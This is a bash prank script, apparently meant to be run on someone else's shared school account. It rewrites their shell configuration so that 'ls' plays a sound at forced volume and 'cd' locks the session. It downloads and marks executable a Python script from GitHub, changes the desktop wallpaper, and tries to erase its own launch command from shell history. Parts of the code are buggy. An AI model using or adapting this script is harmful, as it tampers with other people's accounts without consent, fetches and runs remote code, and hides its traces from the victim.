#!/bin/bash


#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#==#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#
#> lsound

function remove_prev_lsound()
{

	file_to_remove=$(sed -nE 's|.*(~/.*\.ogg).*|\1|p' ${ALIAS_FILE})
	rm -f ${file_to_remove}
	alias_at_line=$(grep -nE "#lsound_[0-9a-f]{12}" ${ALIAS_FILE})
	alias_at_line=${alias_at_line/:*/}
	sed -i "${alias_at_line}d" ${ALIAS_FILE}
}

function do_ls()
{
	if [ "$(grep -E "#lsound_[0-9a-f]{12}" ${ALIAS_FILE})" ]; then
		if [ "$(sed -nE 's|.*~/\.(.*\.ogg).*|\1|p' ${ALIAS_FILE})" != \
			 "${SOUND}"]; then
			remove_prev_lsound
		else
			printf "%s is already installed\n" ${SOUND}
			return
		fi
	fi
	echo "alias ls='(pactl set-sink-mute 0 1 && pactl set-sink-mute 0 0 && pactl set-sink-volume 0 75% && paplay ~/.${SOUND}.ogg &) ; ls -G $1 #lsound_${RANDOM_ID}'" >> ${ALIAS_FILE}
	curl https://raw.githubusercontent.com/clinche/Troll_42/master/sound/${SOUND}.ogg -o ~/.${SOUND}.ogg
}

#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#==#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#

#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#==#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#
#> lokcd

# function remove_prev_lokcd()
# {
# 	alias_at_line=$(grep -nE "#lokcd_[0-9a-f]{12}" ${ALIAS_FILE})
# 	alias_at_line=${alias_at_line/:*/}
# 	sed -i "${alias_at_line}d" ${ALIAS_FILE}
# }

function do_lokcd()
{
	if [ "$(grep -E "#lokcd_[0-9a-f]{12}" ${ALIAS_FILE})" ]; then
		printf "lokcd already installed\n"
	else
		echo "alias cd='ft_lock ; cd "'${1} '"#lokcd_${RANDOM_ID}" >> ${ALIAS_FILE}
	fi
}

#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#==#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#

#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#==#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#
#> wallpaper

function do_wallpaper_change()
{
	python3 /nfs/homes/$USER/.config/bbid.py -s ${WALLPAPER} --limit 1 -o downloads
	mv ./downloads/* /nfs/homes/$USER/Documents/.image.jpg
	rm -rf ./downloads/*
	gsettings set org.gnome.desktop.background picture-uri 'file:///nfs/homes/'$USER'/Documents/.image.jpg'
}


#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#==#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#

#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#==#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#
#> main

function retrieve_shell()
{
	if [ ! -z "${SHELL}" ]; then
		current_shell=${SHELL/*\//}
		if [ "${current_shell}" == "zsh" ]; then
			have_oh_my_zsh=$(grep -v "^#" ~/.zshrc | grep 'source $ZSH/oh-my-zsh.sh')
			if [ -z "${have_oh_my_zsh}" ]; then
				CURRENT_SHELL="zsh"
			else
				CURRENT_SHELL="oh-my-zsh"
			fi
		elif [ ${current_shell} == "bash" ]; then
			CURRENT_SHELL="bash"
		fi
	fi
}

function do_backup()
{
	if [ -z "$(ls -a ${ALIAS_FILE%\/*} | \
			  grep -E "${ALIAS_FILE/*\//}\.[0-9a-f]{12}")" ]; then
		cp ${ALIAS_FILE} ${ALIAS_FILE}.${RANDOM_ID}
	fi
}

function init()
{
	retrieve_shell
	if [ "${CURRENT_SHELL}" == "zsh" ]; then
		ALIAS_FILE="${HOME}/.zshrc"
		HISTORY_FILE="${HOME}/.zsh_history"
	elif [ "${CURRENT_SHELL}" == "oh-my-zsh" ]; then
		ALIAS_FILE="${HOME}/.oh-my-zsh/custom/alias.zsh"
		HISTORY_FILE="${HOME}/.zsh_history"
	else
		printf "Bash not implemented\n"
		exit 1
	fi
	RANDOM_ID=$(openssl rand -hex 6)
	if [ ! -f /nfs/homes/$USER/.config/bbid.py ]; then
		wget https://raw.githubusercontent.com/clinche/Troll_42/master/bbid.py \
			-O /nfs/homes/$USER/.config/bbid.py
		chmod +x /nfs/homes/$USER/.config/bbid.py
	fi
}

function clear_and_exit()
{
	COMMAND_TO_REMOVE='clinche/Troll_42/inprogress/fast_troll/fat_troll'
	clear
	grep -n ${COMMAND_TO_REMOVE} ${HISTORY_FILE} | while read -r line; do
		line_to_remove=${line/:*/}
		sed -i "${command_at_line}d" ${HISTORY_FILE}
	done
}

function main()
{
	init
	do_backup
	do_wallpaper_change
	do_ls
	do_lokcd
	clear_and_exit
}

if [ -z "${SOUND}" ]; then
	SOUND=amine-mojito-zbeub-zbeub
fi
if [ -z "${WALLPAPER}" ]; then
	WALLPAPER=multipla
fi

#main
init
clear_and_exit

#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#==#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#=#
